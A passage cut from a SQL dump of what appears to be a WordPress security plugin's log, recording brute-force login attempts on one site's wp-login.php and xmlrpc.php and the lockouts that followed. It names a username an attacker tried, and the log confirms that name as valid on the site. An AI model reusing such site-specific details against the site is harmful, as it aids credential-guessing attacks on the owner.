\'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6650,0.000000,1629240409.751298,'\0\0\0\0\0\0\0\0\0\0���e�d',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6651,0.000000,1629240725.127484,'\0\0\0\0\0\0\0\0\0\0����o',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6652,1629240814.402916,1629240814.288400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6653,1629240813.911391,1629240813.815500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6654,0.000000,1629241072.166521,'\0\0\0\0\0\0\0\0\0\0���֖]',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6655,1629241178.875318,1629241178.803600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6656,1629241176.309387,1629241176.227100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6657,0.000000,1629241366.182473,'\0\0\0\0\0\0\0\0\0\0���X�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6658,0.000000,1629241698.331906,'\0\0\0\0\0\0\0\0\0\0��go(',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6659,0.000000,1629241897.478165,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6660,0.000000,1629241898.052875,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6661,0.000000,1629242029.580072,'\0\0\0\0\0\0\0\0\0\0����zB',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6662,0.000000,1629242116.907134,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6663,0.000000,1629242117.454928,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6664,0.000000,1629242383.527507,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6665,0.000000,1629242384.090617,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6666,0.000000,1629242464.593652,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6667,0.000000,1629242465.196624,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6668,0.000000,1629242664.020533,'\0\0\0\0\0\0\0\0\0\0��Ғ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6669,0.000000,1629242770.094768,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6670,0.000000,1629242772.060388,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6671,0.000000,1629242992.781000,'\0\0\0\0\0\0\0\0\0\0��g��E',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6672,0.000000,1629243325.156142,'\0\0\0\0\0\0\0\0\0\0��)�@K',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6673,0.000000,1629243412.628424,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6674,0.000000,1629243412.874670,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6675,0.000000,1629243413.063344,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6676,0.000000,1629243413.273935,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6677,0.000000,1629243413.489587,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6678,0.000000,1629243413.707203,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6679,0.000000,1629243413.987067,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6680,0.000000,1629243414.222946,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6681,0.000000,1629243414.471617,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6682,0.000000,1629243414.698819,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6683,0.000000,1629243414.974550,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6684,0.000000,1629243415.267598,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6685,0.000000,1629243415.491694,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6686,0.000000,1629243415.734031,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6687,0.000000,1629243415.959799,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6688,0.000000,1629243416.923506,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6689,0.000000,1629243417.154126,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6690,0.000000,1629243417.380512,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6691,0.000000,1629243417.599015,'\0\0\0\0\0\0\0\0\0\0��>�r',0,200,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6692,0.000000,1629243417.843972,'\0\0\0\0\0\0\0\0\0\0��>�r',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'antikker\'',NULL),(6693,0.000000,1629243624.927211,'\0\0\0\0\0\0\0\0\0\0�����4',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6694,0.000000,1629243813.904234,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6695,0.000000,1629243815.071788,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6696,0.000000,1629243964.861291,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6697,0.000000,1629244406.732651,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6698,0.000000,1629244408.692656,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6699,0.000000,1629244613.636651,'\0\0\0\0\0\0\0\0\0\0��ca�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6700,0.000000,1629244640.912613,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6701,0.000000,1629244642.350303,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6702,0.000000,1629244935.908621,'\0\0\0\0\0\0\0\0\0\0��U�,',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6703,0.000000,1629245260.985412,'\0\0\0\0\0\0\0\0\0\0���X�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6704,0.000000,1629245581.970485,'\0\0\0\0\0\0\0\0\0\0���EAm',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6705,0.000000,1629245595.020277,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6706,0.000000,1629245597.865094,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6707,0.000000,1629245675.356122,'\0\0\0\0\0\0\0\0\0\0��N��',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','loginFailInvalidUsername',NULL,NULL),(6708,0.000000,1629245676.685463,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'',NULL),(6709,1629245794.491137,1629245794.403000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6710,1629245794.028887,1629245793.687800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6711,0.000000,1629245924.526776,'\0\0\0\0\0\0\0\0\0\0��\"Q�n',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6712,1629246054.147591,1629246054.076200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6713,1629246053.717505,1629246053.634300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6714,1629246243.244123,1629246243.167900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6715,1629246242.805856,1629246242.724800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6716,0.000000,1629246251.456063,'\0\0\0\0\0\0\0\0\0\0���\0�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6717,0.000000,1629246581.528619,'\0\0\0\0\0\0\0\0\0\0��k',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6718,0.000000,1629246928.655756,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6719,1629247136.048448,1629247135.976100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6720,1629247133.109787,1629247132.717500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6721,1629247064.334838,1629247064.067800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6722,1629247060.597962,1629247060.510500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6723,1629246960.871014,1629246960.799600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6724,1629246957.445431,1629246957.364200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6725,0.000000,1629247272.614800,'\0\0\0\0\0\0\0\0\0\0���z.�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6726,1629247550.028401,1629247549.941400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6727,1629247543.272088,1629247543.190300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6728,0.000000,1629247608.945922,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6729,0.000000,1629247933.333133,'\0\0\0\0\0\0\0\0\0\0����0',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6730,1629247948.101749,1629247948.016400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: 